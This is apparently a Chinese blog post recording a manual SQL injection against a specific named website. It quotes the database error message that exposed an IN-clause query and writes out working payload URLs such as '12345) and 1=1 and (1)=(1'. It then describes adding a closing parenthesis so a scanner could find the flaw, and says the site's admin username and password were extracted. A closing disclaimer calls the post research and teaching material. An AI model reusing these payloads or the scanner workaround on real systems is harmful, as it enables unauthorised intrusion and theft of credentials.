注入漏洞攻击已经被哪些大牛们发掘的很深了,常见的注入攻击语句也已被攻击者熟知,比如经典的1=1之类的,小竹把这些注入攻击归类为三大类,一种是数字 型的注入,一种是字符型的注入,还有一种是搜索型的注入,其实这些攻击手法已经借助于扫描工具来实现, 但是要是程序里面的SELECT语句是这样写的话,扫描软件一般都扫不出漏洞了。下面是我手动注入的一次记录,在尝试了N次手动检测后,终于找到一个页面 有漏洞,参数后加一’使之暴错,出现以下的提示信息:
以下是引用片段: Database Engine 错误 '80040e14' 字符串的语法错误 在查询表达式 'ArticleID in (1234, 5678, 12345') order by ArticleID desc' 中。 /check.asp,行 56 |
显示,这种语句是IN语句的,我们构造如下的URL进行攻击
以下是引用片段: http://www.qhwins.com/?add=12345) and 1=1 and (1)=(1 |
页面显示订购产品信息
以下是引用片段: http://www.qhwins.com/?add=12345) and 1=2 and (1)=(1 |
订购信息置空了,看来有得玩。
然后拿出扫描工具,写上扫描注入地址http://www.qhwins.com/?add=12345 点击扫描,P都没有扫出来,不要紧,在URL中加上一个右括号,http://www.qhwins.com/?add=12345) 接着扫描,OK,检测到漏洞,成功猜解出后台用户名密码
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论